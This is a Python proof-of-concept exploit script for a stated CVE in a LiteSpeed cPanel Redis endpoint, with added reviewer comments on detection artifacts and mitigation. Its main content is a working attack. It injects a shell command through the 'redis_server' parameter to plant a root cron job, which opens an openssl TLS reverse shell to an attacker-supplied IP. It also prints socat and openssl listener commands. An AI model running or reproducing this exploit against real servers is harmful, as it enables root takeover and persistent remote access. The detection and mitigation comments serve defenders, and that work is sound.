import requests
import urllib3
import argparse
import sys

# Suppress urllib3's InsecureRequestWarning for the whole process. The request
# issued in main() passes verify=False, so without this line every call would
# warn that the server certificate is not being validated.
# NOTE(review): with the warning silenced, nothing tells the operator that the
# cPanel credentials are sent over a connection whose peer is unauthenticated.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def main():
    """Send one authenticated request carrying a cron-entry payload.

    Parses the command line, builds a multi-line cron entry, and issues a
    single GET to ``<host>/execute/Litespeed/redisAble.php`` with that entry
    embedded in the ``redis_server`` query parameter. Prints the status code
    and the first 500 characters of the response, then prints listener hints.
    Exits with status 1 only when the request raises an exception.

    Artifacts named in this function that are useful for detection and
    triage on a host where this has been run against:
      * cron file ``/etc/cron.d/lsws_tls_rev``
      * named pipe ``/tmp/lsws_pipe``
      * log file ``/root/.lsws_pwned.log``
      * process-match string ``lsws_tls_rev``
    """
    parser = argparse.ArgumentParser(description="CVE-2026-48172 PoC - LiteSpeed cPanel Redis TLS Reverse Shell")
    # Valid cPanel account credentials are mandatory, so the request below is
    # always an authenticated one.
    parser.add_argument("-u", "--user", required=True, help="cPanel username")
    parser.add_argument("-p", "--password", required=True, help="cPanel password")
    parser.add_argument("-H", "--host", default="localhost:2083", 
                        help="cPanel host with port (default: localhost:2083)")
    parser.add_argument("-i", "--attacker-ip", required=True, help="Your IP for reverse shell")
    parser.add_argument("-P", "--attacker-port", type=int, default=8443, help="Reverse shell port (default: 8443)")
    
    args = parser.parse_args()

    # Smart protocol detection
    # Only a prefix test is applied. A value that merely begins with
    # "localhost" or "127.0.0.1" is given http://, so the credentials set on
    # the session below travel in cleartext to whatever that name resolves to.
    # A value that begins with "http" (including a bare hostname such as
    # "httpd...") is used as-is with no scheme added.
    host = args.host.strip()
    if not host.startswith("http"):
        if host.startswith("localhost") or host.startswith("127.0.0.1"):
            protocol = "http://"
        else:
            protocol = "https://"
        host = protocol + host

    print(f"[+] Target: {host}")
    print(f"[+] Attacker: {args.attacker_ip}:{args.attacker_port}")

    # TLS Encrypted Reverse Shell Payload
    # The text below is a cron entry run as root every minute. It references
    # the pipe, log file and process-match string listed in the docstring and
    # starts `openssl s_client` towards the address given on the command line.
    # Detection: file-integrity monitoring on /etc/cron.d, and alerting on
    # `openssl s_client` spawned beneath cron with outbound connections.
    TLS_PAYLOAD = f"""* * * * * root /bin/bash -c '
if ! pgrep -f "lsws_tls_rev" > /dev/null; then
  mkfifo /tmp/lsws_pipe 2>/dev/null || true;
  openssl s_client -quiet -connect {args.attacker_ip}:{args.attacker_port} < /tmp/lsws_pipe | /bin/sh > /tmp/lsws_pipe 2>&1 &
  echo "[+] TLS root shell connected $(date)" >> /root/.lsws_pwned.log;
  rm -f /tmp/lsws_pipe;
fi'"""

    session = requests.Session()
    # A (user, password) tuple makes requests send HTTP Basic authentication.
    session.auth = (args.user, args.password)

    # Use correct endpoint for the lab
    url = f"{host}/execute/Litespeed/redisAble.php"
    
    # The `redis_server` value is an address followed by `;` and a shell
    # redirection into /etc/cron.d. This only has an effect if the endpoint
    # hands the parameter to a shell unescaped; the server code is not shown
    # here, so confirm against the vendor advisory for the CVE named above.
    # Mitigation on the server side: accept only a strict hostname/IP (and
    # port) pattern for this parameter and never build a shell command from it.
    params = {
        "enable": "1",
        "redis_server": f"127.0.0.1; echo '{TLS_PAYLOAD}' > /etc/cron.d/lsws_tls_rev"
    }

    print("[+] Sending CVE-2026-48172 exploit with TLS reverse shell...")
    try:
        # Sent as a GET, so the whole payload is in the query string and will
        # appear URL-encoded in web access logs: a `redis_server` value
        # containing `;`, `>` or newlines on this path is a search pivot.
        # verify=False disables certificate validation for this request.
        r = session.get(url, params=params, verify=False, timeout=15)
        print(f"Status: {r.status_code}")
        print("Response:", r.text[:500])
        
        if r.status_code == 200:
            print("[+] Exploit request sent successfully!")
        else:
            print("[-] Warning: Non-200 response")
            
    except Exception as e:
        print(f"[-] Request failed: {e}")
        sys.exit(1)

    # NOTE(review): everything below prints for any HTTP status, including the
    # non-200 branch above; the output alone does not show that the server
    # accepted or acted on the request.
    print("\n[+] Exploit sent successfully!")
    print(f"[*] Start TLS listener:")
    print(f"    openssl s_server -quiet -key key.pem -cert cert.pem -port {args.attacker_port}")
    print(f"    OR")
    print(f"    socat OPENSSL-LISTEN:{args.attacker_port},cert=cert.pem,key=key.pem,reuseaddr,fork EXEC:/bin/bash,pty,stderr,setsid,sigint,sane")
    print("[*] Wait up to 60 seconds for root callback")

# Run main() only when the file is executed as a script. Importing the module
# still executes the module-level urllib3.disable_warnings() call.
if __name__ == "__main__":
    main()